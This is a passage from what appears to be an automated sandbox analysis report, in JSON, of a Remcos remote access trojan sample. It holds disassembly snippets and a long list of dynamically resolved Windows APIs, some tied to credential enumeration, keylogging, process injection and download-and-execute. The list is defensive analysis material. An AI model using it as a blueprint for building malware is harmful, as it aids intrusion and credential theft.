[ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"file.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RmRegisterResources (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RmGetList (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RmEndSession (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter OfflineFilesQueryStatus (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ReleaseStgMedium (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CoGetMalloc (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GrooveChainGetGlobalInterfacePtrAddress (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GrooveChainCoCreateInstance (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter NetShareEnum (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SLGetWindowsInformationDWORD (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FindFirstStreamW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter FindNextStreamW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter PnpIsFilePnpDriver (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter DevRtlGetThreadLogToken (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter NetApiBufferFree (UID: 00000000-00005804)\n \"file.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005804)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetExtendedUdpTable (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationProcess (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetFinalPathNameByHandleW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RmStartSession (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RmRegisterResources (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RmGetList (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RmEndSession (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ZwCreateSection (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ZwMapViewOfSection (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ZwUnmapViewOfSection (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ZwClose (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateRemoteThread (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetNativeSystemInfo (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CopyFileA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CopyFileW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WinExec (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindResourceW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateProcessW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter OpenMutexA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter OpenMutexW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLangID (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetFileTime (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetWriteWatch (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter HeapWalk (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter IsNativeVhdBoot (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter DebugBreak (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlGetNtProductType (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LdrLoadDll (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LdrUnloadDll (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LdrGetDllHandle (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LdrGetProcedureAddress (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlAddVectoredExceptionHandler (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter NtSystemDebugControl (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlCompressBuffer (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBuffer (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBufferEx (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleBitmap (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetDeviceCaps (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetIpNetTable (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetTcpTable2 (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetBestRoute (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetAsyncKeyState (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetKeyState (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetActiveWindow (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetWindowTextW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CredEnumerateA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CredEnumerateW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatusEx (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithTokenW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LsaLookupSids (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SystemFunction032 (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SystemFunction033 (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetOpenA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetOpenW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetConnectA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetConnectW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetReadFile (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ObtainUserAgentString (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00005888)\n \"remcos.exe\" called 